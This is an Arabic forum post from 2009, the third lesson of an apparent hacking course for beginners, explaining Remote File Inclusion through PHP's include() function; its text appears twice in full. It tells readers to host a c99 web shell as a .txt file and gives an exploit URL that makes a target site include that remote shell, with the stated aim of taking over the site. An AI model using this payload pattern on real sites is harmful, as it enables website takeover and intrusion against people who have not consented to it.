ASDELY-ScOrPiOn
07-21-2009, 10:35 AM
السلام عليكم ورحمة الله وبركاته
وصلنا والحمدلله لدرس الثالث في الدورة وهي ((دينامكية عمل Remote File include))
كما قلت في الدرس الثاني انه هذه الثغرة شبه منقرضه فقررت ان أشرحها كمعلومة عامة للجداد في الهكر
الثغرة اساسها خطأ في دالة include() في لغة الـPHP واللي يعرف للغة بيفهم قصدي
هذه الدالة شغلتها انه تقترن ملف من الملفات مثلا
www.site.com/index.php?id=main.html
هنا المبرمج يطلب من المتغير id الذي يحتويه ملف index.php بأن يقترن محتوى ملف main.html
ففكر بعض الهكر في طريقة لإقتران محتوى الشل الخاص بهم ليستولوا على الموقع
والطريقة هي ان ترفع شل على استضافة مجانية او مدفوعه بشرط ان يكون امتداد الملف txt
مثلا هذا الشل
http://www.c99.mobi/c99.txt
نريد ان نجعل index.php يقترنه عن طريق نفس المتغير id
وطريقة كتابة الإستغلال هي
www.site.com/index.php?id=http://www.c99.mobi/c99.txt?
مع وضع علامة الـ ؟ في نهاية رابط الشل
واذا الثغرة شغاله >>> وانا لأتوقع هذا الشيء
فسوف ترى الشل امامك واذا لم تشتغل الثغرة سترى خطأ او سيحولك الموقع الى صفحة اخرى http://sec-t.com/cc/images/smilies/whistling.gif
الى هن ننهي الشرح http://sec-t.com/cc/images/smilies/smilie76.gif
وصلنا والحمدلله لدرس الثالث في الدورة وهي ((دينامكية عمل Remote File include))
كما قلت في الدرس الثاني انه هذه الثغرة شبه منقرضه فقررت ان أشرحها كمعلومة عامة للجداد في الهكر
الثغرة اساسها خطأ في دالة include() في لغة الـPHP واللي يعرف للغة بيفهم قصدي
هذه الدالة شغلتها انه تقترن ملف من الملفات مثلا
www.site.com/index.php?id=main.html
هنا المبرمج يطلب من المتغير id الذي يحتويه ملف index.php بأن يقترن محتوى ملف main.html
ففكر بعض الهكر في طريقة لإقتران محتوى الشل الخاص بهم ليستولوا على الموقع
والطريقة هي ان ترفع شل على استضافة مجانية او مدفوعه بشرط ان يكون امتداد الملف txt
مثلا هذا الشل
http://www.c99.mobi/c99.txt
نريد ان نجعل index.php يقترنه عن طريق نفس المتغير id
وطريقة كتابة الإستغلال هي
www.site.com/index.php?id=http://www.c99.mobi/c99.txt?
مع وضع علامة الـ ؟ في نهاية رابط الشل
واذا الثغرة شغاله >>> وانا لأتوقع هذا الشيء
فسوف ترى الشل امامك واذا لم تشتغل الثغرة سترى خطأ او سيحولك الموقع الى صفحة اخرى http://sec-t.com/cc/images/smilies/whistling.gif
الى هن ننهي الشرح http://sec-t.com/cc/images/smilies/smilie76.gif